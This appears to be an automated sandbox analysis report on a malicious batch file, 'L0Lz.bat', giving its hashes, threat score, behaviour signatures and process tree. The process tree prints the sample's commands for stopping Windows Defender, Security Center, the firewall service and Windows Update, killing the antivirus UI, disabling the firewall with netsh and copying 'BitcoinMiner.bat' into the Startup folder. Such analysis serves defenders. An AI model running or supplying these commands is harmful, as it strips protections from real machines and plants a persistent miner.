Analysis

  • max time kernel
    279s
  • max time network
    200s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/02/2024, 11:58

General

  • Target

    L0Lz.bat

  • Size

    6KB

  • MD5

    74f8a282848b8a26ceafe1f438e358e0

  • SHA1

    007b350c49b71b47dfc8dff003980d5f8da32b3a

  • SHA256

    fc94130b45112bdf7fe64713eb807f4958cdcdb758c25605ad9318cd5a8e17ae

  • SHA512

    3f73c734432b7999116452e673d734aa3f5fe9005efa7285c76d28a98b4c5d2620e772f421e030401ad223abbb07c6d0e79b91aa97b7464cb21e3dc0b49c5a81

  • SSDEEP

    192:tlYUT1jLPD5mZkRr3TfLQ4/zus8joPRJRqU1jXEmo:tlY85XW

Score
8/10

Malware Config

Signatures

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Drops startup file 2 IoCs
  • Kills process with taskkill 1 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\L0Lz.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4780
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1996
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:2072
      • C:\Windows\system32\net.exe
        net stop "SDRSVC"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2920
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop "SDRSVC"
          3⤵
            PID:4664
        • C:\Windows\system32\net.exe
          net stop "WinDefend"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:984
        • C:\Windows\system32\taskkill.exe
          taskkill /f /t /im "MSASCui.exe"
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2744
        • C:\Windows\system32\net.exe
          net stop "security center"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:5008
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop "security center"
            3⤵
              PID:388
          • C:\Windows\system32\net.exe
            net stop sharedaccess
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4020
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop sharedaccess
              3⤵
                PID:2064
            • C:\Windows\system32\netsh.exe
              netsh firewall set opmode mode-disable
              2⤵
              • Modifies Windows Firewall
              PID:4640
            • C:\Windows\system32\net.exe
              net stop "wuauserv"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1464
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo tasklist "
              2⤵
                PID:4088
              • C:\Windows\system32\find.exe
                find /I "L0Lz"
                2⤵
                  PID:848
                • C:\Windows\system32\xcopy.exe
                  XCOPY "BitcoinMiner.bat" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
                  2⤵
                  • Drops startup file
                  PID:4688
                • C:\Windows\system32\xcopy.exe
                  XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                  2⤵
                    PID:4800
                  • C:\Windows\system32\xcopy.exe
                    XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                    2⤵
                      PID:4340
                    • C:\Windows\system32\xcopy.exe
                      XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                      2⤵
                        PID:4984
                      • C:\Windows\system32\xcopy.exe
                        XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                        2⤵
                          PID:2320
                        • C:\Windows\system32\xcopy.exe
                          XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                          2⤵
                            PID:4168
                          • C:\Windows\system32\xcopy.exe
                            XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                            2⤵
                              PID:2276
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 stop "WinDefend"
                            1⤵
                              PID:1136
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 stop "wuauserv"
                              1⤵
                                PID:4288
                              • C:\Windows\System32\rundll32.exe
                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                1⤵
                                  PID:3520
                                • C:\Windows\system32\cmd.exe
                                  "C:\Windows\system32\cmd.exe"
                                  1⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1744
                                  • C:\Windows\system32\whoami.exe
                                    whoami
                                    2⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3616

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Temp\BitcoinMiner.bat

                                  Filesize

                                  269B

                                  MD5

                                  f971f4ae767fafa564b3f9266027599a

                                  SHA1

                                  df04f7017164d35943c959a057a8f24994724ba6

                                  SHA256

                                  a45d90c80db74841afc1658c8db4566288ff21f76f89f382cd3dc675fd783f2c

                                  SHA512

                                  a459640d96a1abb5ee347171db77801c6e10fde2b2164288c3908c7cc5c472ed9e779993a5761c82fdc946867f1525993e75eee7112c211d1283a97d043f9bee